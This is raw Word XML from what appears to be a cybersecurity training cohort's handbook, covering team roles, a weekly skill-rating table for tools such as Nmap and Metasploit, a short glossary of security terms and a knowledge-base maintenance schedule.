    <w:p w14:paraId="73AB2620" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Evenings and weekends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E28274" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Contributions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Knowledge base structure, weekly reporting template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3541D" w14:textId="73A4D0C2" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="0027545C" w:rsidP="00807D52">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sisipho Mankayi</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - Technical Lead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AEAA4F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Specialties:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Linux systems, scripting, vulnerability research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C8875F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Mastery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Burp Suite, John the Ripper, Custom scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE05DA" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Contributions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Automated scanning scripts, vulnerability database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F335AD5" w14:textId="77777777" w:rsidR="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Skill Development Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506716B4" w14:textId="77777777" w:rsidR="00425812" w:rsidRDefault="00425812" w:rsidP="00807D5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1554"/>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="1556"/>
        <w:gridCol w:w="1573"/>
      </w:tblGrid>
      <w:tr w:rsidR="005426EB" w14:paraId="1F9A3943" w14:textId="77777777" w:rsidTr="005426EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53E4A4FA" w14:textId="011AE000" w:rsidR="005426EB" w:rsidRPr="00263242" w:rsidRDefault="005426EB" w:rsidP="00807D52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Skill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0599F30D" w14:textId="404EAC1B" w:rsidR="005426EB" w:rsidRPr="00263242" w:rsidRDefault="005426EB" w:rsidP="00807D52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Week </w:t>
            </w:r>
            <w:r w:rsidR="00AB1C0C" w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0DE03B" w14:textId="349D9295" w:rsidR="005426EB" w:rsidRPr="00263242" w:rsidRDefault="005426EB" w:rsidP="00807D52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Week </w:t>
            </w:r>
            <w:r w:rsidR="00AB1C0C" w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75604592" w14:textId="71C507EE" w:rsidR="005426EB" w:rsidRPr="00263242" w:rsidRDefault="005426EB" w:rsidP="00807D52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Week </w:t>
            </w:r>
            <w:r w:rsidR="00AB1C0C" w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0959E1E9" w14:textId="3830A16E" w:rsidR="005426EB" w:rsidRPr="00263242" w:rsidRDefault="005426EB" w:rsidP="00807D52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Week </w:t>
            </w:r>
            <w:r w:rsidR="00AB1C0C" w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="583C6276" w14:textId="0EFB5C49" w:rsidR="005426EB" w:rsidRPr="00263242" w:rsidRDefault="00AB1C0C" w:rsidP="00807D52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00263242">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Improvement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000711B2" w14:paraId="287AE1D9" w14:textId="77777777" w:rsidTr="009507C1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A93847F" w14:textId="7DD546DC" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00807D52">
              <w:t>Nmap Proficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="084EEF15" w14:textId="732FCE43" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>2/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57369E51" w14:textId="7975A5B9" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65647146" w14:textId="270F93DE" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>5/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="595A8131" w14:textId="1BA8845E" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>5/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="001B0AD3" w14:textId="2AEAC006" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>+3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000711B2" w14:paraId="389DBFEA" w14:textId="77777777" w:rsidTr="003B5290">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D370738" w14:textId="1258A5EE" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>Metasploit Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="131CB8DA" w14:textId="6DE26111" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>1/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FEC3DF0" w14:textId="20B2BF91" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3511099D" w14:textId="0AD570A9" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69AA9550" w14:textId="394FCC00" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="502F10A1" w14:textId="4551F637" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>+3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000711B2" w14:paraId="2C074C34" w14:textId="77777777" w:rsidTr="003B5290">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16D83C2B" w14:textId="046BD0DB" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>Report Writing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0088EE07" w14:textId="3738175C" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>2/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2020430F" w14:textId="7DE4E7EE" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>3/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10B958FD" w14:textId="745F6A21" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3197AC47" w14:textId="0B775F24" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>5/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22B8F121" w14:textId="7D8991F6" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>+3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000711B2" w14:paraId="71229140" w14:textId="77777777" w:rsidTr="003B5290">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F03347B" w14:textId="51A2888D" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>Methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29011CC0" w14:textId="635D630F" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>2/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AB8CD94" w14:textId="10AE2E7D" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>3/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EB35E1A" w14:textId="21B178D0" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="122DD78A" w14:textId="30749383" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>5/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03B27AED" w14:textId="034BDB2A" w:rsidR="000711B2" w:rsidRDefault="000711B2" w:rsidP="000711B2">
            <w:r w:rsidRPr="00807D52">
              <w:t>+3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0680E7F5" w14:textId="77777777" w:rsidR="00425812" w:rsidRPr="00807D52" w:rsidRDefault="00425812" w:rsidP="00807D52"/>
    <w:p w14:paraId="1EA34863" w14:textId="409246DC" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="000711B2" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECTION 8: APPENDICES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791CB3D6" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Appendix A: Glossary of Terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C0995" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Common Vulnerabilities and Exposures - standardized identifiers for vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D78883E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVSS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Common Vulnerability Scoring System - framework for rating severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140FC10A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Code executed on target after exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D62B1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellcode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Small piece of code used as payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47380AA8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00000000" w:rsidP="00807D52">
      <w:r>
        <w:pict w14:anchorId="6442A99C">
          <v:rect id="_x0000_i1025" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D1574" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Maintenance Schedule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CCD7F7" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t>Weekly review: Every Friday 5 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3585C385" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Archive inactive articles: Quarterly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25374566" w14:textId="477E3780" w:rsidR="00E54A29" w:rsidRDefault="00807D52" w:rsidP="00033E9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Major overhaul: End of each coho</w:t>
      </w:r>
      <w:r w:rsidR="00033E9C">
        <w:t>rt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E54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4AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E032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86AE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DA2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C7DC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2D0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15DE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1620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DD104D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F886F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95B5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B4C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C49FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCA0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86CC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FC6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C17DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4B8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D661A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DCA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368AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45D2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D909E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF64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45AEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B68A6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542116"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F8A4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24836"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F52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0D476A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05CE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661C90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D18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914902">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1971283359">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1585526514">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="952588887">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1702515522">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="771895392">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1336494336">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1475637123">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1098914696">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1452284146">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="117185277">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1873767180">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="758331239">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1413433437">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="285475452">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1401951283">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="17200855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D52"/>
    <w:rsid w:val="000176B9"/>
    <w:rsid w:val="00033E9C"/>
    <w:rsid w:val="000711B2"/>
    <w:rsid w:val="0008081D"/>
    <w:rsid w:val="001E40A4"/>
    <w:rsid w:val="001E64FD"/>
    <w:rsid w:val="00263242"/>
    <w:rsid w:val="0027545C"/>
    <w:rsid w:val="00413D84"/>
    <w:rsid w:val="00425812"/>
    <w:rsid w:val="004818DD"/>
    <w:rsid w:val="004B14BF"/>
    <w:rsid w:val="00503FC4"/>
    <w:rsid w:val="00511E56"/>
    <w:rsid w:val="005426EB"/>
    <w:rsid w:val="00570F7C"/>
    <w:rsid w:val="005A7254"/>
    <w:rsid w:val="005C2688"/>
    <w:rsid w:val="005C3DE0"/>
    <w:rsid w:val="005E1B62"/>
    <w:rsid w:val="00602480"/>
    <w:rsid w:val="00624E2F"/>
    <w:rsid w:val="00624F89"/>
    <w:rsid w:val="00627156"/>
    <w:rsid w:val="006320D8"/>
    <w:rsid w:val="006509C3"/>
    <w:rsid w:val="006E6E9D"/>
    <w:rsid w:val="0071479B"/>
    <w:rsid w:val="007552B3"/>
    <w:rsid w:val="00776DB8"/>
    <w:rsid w:val="007C5985"/>
    <w:rsid w:val="007C799E"/>
    <w:rsid w:val="00807D52"/>
    <w:rsid w:val="0081728E"/>
    <w:rsid w:val="0084287D"/>
    <w:rsid w:val="00854FAD"/>
    <w:rsid w:val="00867CDB"/>
    <w:rsid w:val="008A0E5E"/>
    <w:rsid w:val="00A31806"/>
    <w:rsid w:val="00A60A46"/>
    <w:rsid w:val="00AB1C0C"/>
    <w:rsid w:val="00BF0006"/>
    <w:rsid w:val="00C05661"/>
    <w:rsid w:val="00C276D4"/>
    <w:rsid w:val="00CC1CFC"/>
    <w:rsid w:val="00D136A6"/>
    <w:rsid w:val="00D21130"/>
    <w:rsid w:val="00DA5925"/>
    <w:rsid w:val="00DF3867"/>
    <w:rsid w:val="00E3722E"/>
    <w:rsid w:val="00E54A29"/>
    <w:rsid w:val="00EB2A8B"/>
    <w:rsid w:val="00F4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6A634"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0B0B20A0-4A23-4F13-80DC-635C4853C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D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D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D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D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D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7D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D5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3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stalfred2016/CyberSecurityCohort.gi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2E7833B52A1B4C89F555FDF77310DB" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="9e647fa0c31410c7cf8850383c5bc61a">
